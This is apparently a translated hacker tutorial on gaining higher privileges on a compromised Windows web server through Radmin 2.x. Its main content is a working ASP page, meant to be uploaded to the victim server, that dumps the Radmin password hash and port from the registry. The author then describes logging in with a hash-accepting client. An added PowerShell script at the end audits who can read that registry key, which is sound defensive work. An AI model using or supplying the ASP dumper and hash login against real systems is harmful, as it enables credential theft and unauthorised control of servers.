Privilege escalation directly through Radmin
Below are the corresponding locations of Radmin in the registry:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter // registry location of the default password (hash)
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port // registry location of the default port
Previously we could use the feature bundled with the Haiyang (Ocean) trojan to read out the key value and then convert it to obtain the hash, but now there is something more convenient: save the following code as an ASP file, upload it to the server, and opening it reads out the Radmin hash and the Radmin service port directly!
<%
'===================================== Main =====================================
Set WSH = Server.CreateObject("WSCRIPT.SHELL")
RadminPath = "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
Parameter = "Parameter"   ' REG_BINARY value holding the password hash
Port = "Port"             ' REG_BINARY value holding the listening port (little-endian)
ParameterArray = WSH.RegRead(RadminPath & Parameter)
Response.Write "The Result of Radmin Hash"
Response.Write "<br><br>"
Response.Write Parameter & ":"
'=========== ReadPassWord =========
' RegRead returns a REG_BINARY value as an array of bytes; print each byte as two hex digits
If IsArray(ParameterArray) Then
    For i = 0 To UBound(ParameterArray)
        If Len(Hex(ParameterArray(i))) = 1 Then
            strObj = strObj & "0" & CStr(Hex(ParameterArray(i)))
        Else
            strObj = strObj & Hex(ParameterArray(i))
        End If
    Next
    Response.Write LCase(strObj)
Else
    Response.Write "Error! Can't Read!"
End If
Response.Write "<br><br>"
'=========== ReadPort =========
PortArray = WSH.RegRead(RadminPath & Port)
If IsArray(PortArray) Then
    Response.Write Port & ":"
    ' The port is stored little-endian: low byte first, high byte second.
    ' Both bytes are zero-padded to two hex digits; without padding a low byte
    ' below 0x10 (e.g. 0x05) would print as a single digit and corrupt the result.
    Response.Write hextointer(Right("0" & Hex(PortArray(1)), 2) & Right("0" & Hex(PortArray(0)), 2))
Else
    Response.Write "Error! Can't Read!"
End If
'=================================== hex TO int ===================================
' Converts a hexadecimal string (either case) to an integer, one digit at a time
Function hextointer(strin)
    Dim i, j, k, result
    result = 0
    For i = 1 To Len(strin)
        j = 0   ' reset per digit so a non-hex character cannot inherit the previous digit's value
        If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) = "F" Then
            j = 15
        End If
        If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then
            j = 14
        End If
        If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then
            j = 13
        End If
        If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then
            j = 12
        End If
        If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then
            j = 11
        End If
        If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then
            j = 10
        End If
        If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then
            j = CInt(Mid(strin, i, 1))
        End If
        ' Weight the digit by 16 for every position it sits left of the last digit
        For k = 1 To Len(strin) - i
            j = j * 16
        Next
        result = result + j
    Next
    hextointer = result
End Function
'====================================== End ======================================
%>
Then use the hash version of the Radmin client to connect to the compromised host, enter the 32-character hash obtained as the password, and, heh, privilege escalation succeeds! This was also my first successful privilege escalation; it felt good, but it has a big limitation: the compromised host must have Radmin installed......
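The technique above works only because the web server's account can read the Radmin 2.x Parameters key. As an added defender-side check (not part of the original post), the following PowerShell script audits that key's ACL and reports any low-privileged principal that holds read rights on it; the list of principals is an assumption and should be adjusted to the accounts your web server and services actually run as.

```powershell
# Added defender-side check: who can read the Radmin 2.x key dumped by the ASP script above?
# The principal list is an assumption; add the identities your application pools run as.
$RadminKey = 'HKLM:\SYSTEM\RAdmin\v2.0\Server\Parameters'
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'BUILTIN\IIS_IUSRS',
    'NT AUTHORITY\IUSR'
)

if (-not (Test-Path -Path $RadminKey)) {
    Write-Output "Radmin 2.x key not present: $RadminKey"
    return
}

# Port is stored as REG_BINARY, little-endian (low byte first); decode it for the report
$portBytes = (Get-ItemProperty -Path $RadminKey -Name 'Port' -ErrorAction SilentlyContinue).Port
if ($portBytes -is [byte[]] -and $portBytes.Length -ge 2) {
    $port = $portBytes[0] + 256 * $portBytes[1]
    Write-Output "Radmin listening port (from registry): $port"
}

# Any of these rights lets a caller read the binary 'Parameter' value (the password hash)
$ReadMask = [System.Security.AccessControl.RegistryRights]::QueryValues -bor
            [System.Security.AccessControl.RegistryRights]::ReadKey -bor
            [System.Security.AccessControl.RegistryRights]::FullControl

$acl = Get-Acl -Path $RadminKey
$exposed = foreach ($rule in $acl.Access) {
    if ($rule.AccessControlType -ne 'Allow') { continue }
    if (($rule.RegistryRights -band $ReadMask) -eq 0) { continue }
    $id = $rule.IdentityReference.Value
    # Match the broad groups above plus any per-host IIS anonymous account (IUSR_<hostname>)
    if ($BroadPrincipals -contains $id -or $id -like '*IUSR*') {
        [pscustomobject]@{ Principal = $id; Rights = $rule.RegistryRights; Inherited = $rule.IsInherited }
    }
}

if ($exposed) {
    Write-Warning "Radmin password hash is readable by low-privileged principals:"
    $exposed | Format-Table -AutoSize
} else {
    Write-Output "No broad read access to $RadminKey"
}
```

Run it elevated; a non-empty table means the web application's identity can dump the hash exactly as the ASP page does, and the key's ACL (typically inherited from HKLM\SYSTEM) should be tightened to administrators and the Radmin service account.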